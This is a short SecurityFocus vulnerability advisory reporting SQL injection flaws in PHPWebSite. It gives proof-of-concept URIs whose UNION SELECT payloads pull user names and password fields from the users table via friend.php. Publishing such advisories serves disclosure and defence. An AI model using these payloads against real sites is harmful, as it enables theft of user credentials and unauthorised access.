Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPWebSite Multiple SQL Injection Vulnerabilities

This issue can be exploited using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20name%20From%20users%20where%20uid=1
http://www.example.com/friend.php?op=FriendSend&sid=-1%20Union%20select%20pass%20From%20users%20where%20uid=1
http://www.example.com/article.php?sid=[sql]







 

Privacy Statement
Copyright 2009, SecurityFocus